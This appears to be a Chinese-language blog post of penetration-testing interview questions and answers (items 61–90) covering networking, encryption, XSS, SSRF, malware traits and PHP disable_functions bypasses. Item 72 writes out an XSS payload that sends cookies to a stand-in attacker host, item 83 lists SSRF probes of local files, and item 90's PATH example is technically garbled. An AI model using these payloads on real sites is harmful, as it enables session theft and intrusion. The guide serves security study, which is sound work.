網絡安全領域各種資源,學習文檔,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各種好玩的項目及好用的工具,歡迎關注。
目錄
滲透測試紅隊面試三
六十一、主機被入侵自查解決方案
六十二、NAT(網絡地址轉換)協議
六十三、內網穿透
六十四、虛擬專用網絡(VPN)
六十五、二層交換機
六十六、路由技術
六十七、三層交換機
六十八、IPv6地址表示
六十九、對稱加密與非對稱加密
七十、同源策略
七十一、Cookie存儲與訪問
七十二、XSS盜取Cookie
七十三、TCP與UDP區別及SYN攻擊
七十四、安全證書
七十五、DVWA搭建
七十六、滲透測試流程
七十七、XSS防御
七十八、IIS防護
七十九、虛擬機連接方式
八十、XSS與Cookie登錄
八十一、JNI函數名轉換
八十二、Frida與Xposed
八十三、SSRF利用
八十四、宏病毒
八十五、APP加殼
八十六、WannaCry特征
八十七、ARM32返回值與返回地址
八十八、HTTPS握手技術
八十九、PHP disable_functions繞過
九十、任意命令執行方式
滲透測試紅隊面試三
六十一、主機被入侵,你會如何處理這件事自查解決方案:六十二、 NAT(網絡地址轉換)協議六十三、內網穿透六十四、虛擬專用網絡六十五、二層交換機六十六、路由技術六十七、三層交換機六十八、IPv6 地址表示六十九、對稱加密非對稱加密?七十、什么是同源策略?七十一、cookie 存在哪里?可以打開嗎七十二、xss 如何盜取 cookie?七十三、tcp、udp 的區別及 tcp 三次握手,syn 攻擊?七十四、證書要考哪些?七十五、DVWA 是如何搭建的?七十六、滲透測試的流程是什么七十七、xss 如何防御七十八、IIS 服務器應該做哪些方面的保護措施:七十九、虛擬機的幾種連接方式及原理八十、xss 有 cookie 一定可以無用戶名密碼登錄嗎?八十一、 JNI 函數在 java 中函數名為 com.didi.security.main,C 中的函數名是什么樣的?八十二、Frida 和 Xposed 框架?八十三、SSRF 利用方式?八十四、宏病毒?八十五、APP 加殼?八十六、勒索軟件 Wanacry 的特征?蠕蟲、僵尸病毒八十七、ARM32 位指令中,返回值和返回地址保存在哪個寄存器中?八十八、HTTPS 握手過程中用到哪些技術?八十九、Linux 中 PHP 環境,已知 disable_functions=exec,passthrupopen,proc_open,shell_exec,system,九十、請寫出兩種有可能實現任意命令執行的方式?
六十一、主機被入侵自查解決方案
- 隔離與止損
- 立即斷開網絡連接,阻斷攻擊者持續訪問路徑;備份當前系統狀態(內存鏡像、磁盤快照)用于取證。
- 禁用可疑賬戶,檢查系統日志(如
/var/log/auth.log
或Windows事件查看器)定位異常登錄記錄。- 漏洞分析與修復
- 使用工具(如
rkhunter
、ClamAV
)掃描后門程序;比對文件哈希值識別篡改文件。- 修復已知漏洞,更新系統補丁,關閉非必要服務端口(如
netstat -ano
排查)。- 加固與監控
- 配置防火墻規則(如iptables/Windows防火墻)、啟用IDS/IPS系統;部署HIDS(主機入侵檢測系統)。
- 審計SSH密鑰、口令策略;啟用多因素認證(MFA)。
六十二、NAT(網絡地址轉換)協議
- 核心功能
- 解決IPv4地址短缺問題,通過映射內網私有IP到公網IP(如PAT實現端口復用)。
- 靜態NAT(一對一映射)、動態NAT(地址池分配)、PAT(Port Address Translation,NAT Overload)。
- 應用場景
- 家庭路由通過NAT共享公網IP;企業內網隱藏真實拓撲結構。
- 局限性
- 破壞端到端透明性,導致P2P應用穿透困難(需STUN/TURN協議輔助)。
六十三、內網穿透
- 技術原理
- 反向代理(如Ngrok):公網服務器中轉內網服務流量。
- 隧道技術(如SSH隧道、VPN):封裝內網流量繞過防火墻。
- 典型工具
- Frp:支持TCP/UDP端口映射;ZeroTier:基于P2P的虛擬局域網。
- 安全風險
- 暴露內網服務可能引入攻擊面(如未授權訪問數據庫)。
六十四、虛擬專用網絡(VPN)
- 核心機制
- 加密隧道(IPsec/OpenVPN)保障數據機密性;支持遠程訪問內網資源。
- 協議對比
- IPsec(網絡層加密,兼容性差)、SSL VPN(基于HTTPS,易穿透防火墻)。
- 企業應用
- 分支機構互聯(Site-to-Site VPN);員工遠程辦公(Client-to-Site VPN)。
六十五、二層交換機
- 工作原理
- 基于MAC地址表轉發幀,支持VLAN劃分隔離廣播域。
- 局限性
- 無法跨子網通信,需依賴路由器或三層交換機。
六十六、路由技術
- 路由類型
- 靜態路由(手動配置)、動態路由協議(OSPF、BGP基于鏈路狀態或路徑矢量)。
- NAT與負載均衡
- 結合策略路由實現流量分流(如企業多出口場景)。
六十七、三層交換機
- 核心特性
- 集成路由功能(基于ASIC硬件加速),支持VLAN間路由。
- 應用場景
- 數據中心核心層實現高速路由轉發。
六十八、IPv6地址表示
- 格式規則
- 8組16進制數(如
2001:0db8:85a3::8a2e:0370:7334
),省略前導零和連續零組。- 地址類型
- 單播(Global Unicast)、組播(Multicast)、鏈路本地(FE80::/10)。
六十九、對稱加密與非對稱加密
- 對稱加密(AES)
- 加解密密鑰相同,速度快,適合大數據量傳輸。
- 非對稱加密(RSA)
- 公鑰加密、私鑰解密,解決密鑰分發問題(如SSL證書交換)。
- 混合應用
- TLS握手階段用RSA交換AES會話密鑰。
七十、同源策略
- 定義
- 瀏覽器阻止跨域腳本訪問其他源的DOM/Cookie(同源:協議+域名+端口一致)。
- 繞過機制
- CORS(服務端設置
Access-Control-Allow-Origin
)、JSONP(動態插入<script>
標簽)。
七十一、Cookie存儲與訪問
- 存儲位置
- 瀏覽器本地(Chrome:
chrome://settings/siteData
),受HttpOnly
標記限制腳本訪問。- 安全風險
- 明文存儲敏感信息可能被XSS竊取(需Secure+HttpOnly+SameSite防護)。
七十二、XSS盜取Cookie
- 攻擊流程
- 注入
<script>document.location='http://attacker/?cookie='+document.cookie</script>
。- 防御措施
- 設置
HttpOnly
阻止JS讀取Cookie;輸入過濾與輸出編碼。
七十三、TCP與UDP區別及SYN攻擊
- 協議對比
- TCP可靠傳輸(ACK確認、重傳)、面向連接;UDP無連接、低延遲(適合音視頻流)。
- 三次握手
- SYN→SYN-ACK→ACK;SYN攻擊通過偽造源IP耗盡服務器半連接隊列。
- 防御手段
- SYN Cookie機制(無狀態驗證)、限制并發半連接數。
七十四、安全證書
- 認證體系
- OSCP(滲透測試)、CISSP(安全管理)、CEH(道德黑客)。
- 技能方向
- 網絡攻防(PNPT)、云安全(CCSP)、逆向工程(GREM)。
七十五、DVWA搭建
- 依賴環境
- LAMP/WAMP環境(PHP 5+、MySQL);配置
config.inc.php
設置數據庫連接。- 漏洞配置
- 手動調整安全等級(Low/High)模擬不同難度場景。
七十六、滲透測試流程
- 階段劃分
- 信息收集(Whois、Nmap)、漏洞掃描(Nessus)、利用(Metasploit)、后滲透(權限維持)。
- 合規性
- 授權書(Scope定義)、規避法律風險(如避免DoS攻擊)。
七十七、XSS防御
- 輸入過濾
- 白名單校驗(如僅允許字母數字);轉義特殊字符(
<
→<
)。- CSP策略
- 響應頭
Content-Security-Policy
限制腳本來源(如'self'
)。
七十八、IIS防護
- 加固措施
- 禁用WebDAV、關閉目錄遍歷;配置請求過濾規則(拒絕
../
路徑)。- 日志審計
- 啟用W3C日志記錄,監控異常請求(如大量404錯誤)。
七十九、虛擬機連接方式
- 橋接模式
- 虛擬機直接接入物理網絡,獨立IP(類似獨立主機)。
- NAT模式
- 共享宿主機IP,通過虛擬NAT設備進行地址轉換。
八十、XSS與Cookie登錄
- 條件限制
- 需目標站點會話僅依賴Cookie(無IP綁定/MFA);若Cookie標記Secure則需HTTPS劫持。
八十一、JNI函數名轉換
- 命名規則
- C函數名格式:
Java_完整類名_方法名
(如Java_com_didi_security_main
),特殊字符用_1
轉義。
八十二、Frida與Xposed
- Frida特性
- 動態插樁(D-Bus通信),支持跨進程Hook(如Android/iOS應用內存修改)。
- Xposed局限
- 需Root環境,基于模塊化Hook框架(全局生效)。
八十三、SSRF利用
- 攻擊向量
- 利用協議處理漏洞(如
file:///etc/passwd
、dict://
探測內網端口)。- 繞過技巧
- 域名重定向(短網址)、IPv6地址格式混淆。
八十四、宏病毒
- 傳播方式
- 依附Office文檔宏代碼,利用社會工程誘導啟用宏。
- 檢測清除
- 禁用宏執行;使用殺毒軟件掃描
*.docm
文件。
八十五、APP加殼
- 技術原理
- 加密DEX/ELF文件,運行時動態解密(如梆梆安全、UPX)。
- 對抗脫殼
- 反調試檢測、多殼嵌套、代碼混淆(OLLVM)。
八十六、WannaCry特征
- 傳播方式
- 利用SMB漏洞(EternalBlue)橫向擴散;加密文件擴展名(
.WNCRY
)。- 防御措施
- 關閉445端口;安裝MS17-010補丁。
八十七、ARM32返回值與返回地址
- 寄存器分配
- 返回值:R0(32位)/R0-R1(64位);返回地址:LR(R14),函數退出時通過
BX LR
跳轉。
八十八、HTTPS握手技術
- 密鑰交換
- ECDHE算法生成臨時密鑰(前向保密);RSA驗證證書鏈。
- 會話復用
- Session ID/Ticket減少握手開銷。
八十九、PHP disable_functions繞過
- 未禁用函數利用
mail()
函數通過LD_PRELOAD
注入共享庫;imagick
模塊處理惡意圖片觸發命令。- 反序列化漏洞
- 利用
phar://
協議觸發反序列化操作鏈(如GadgetChain
)。
九十、任意命令執行方式
- 環境變量注入
- 控制
PATH
變量指向惡意二進制(如echo /tmp > PATH
)。- 外部程序調用
- 利用
ImageMagick
處理漏洞(CVE-2016-3714)執行系統命令。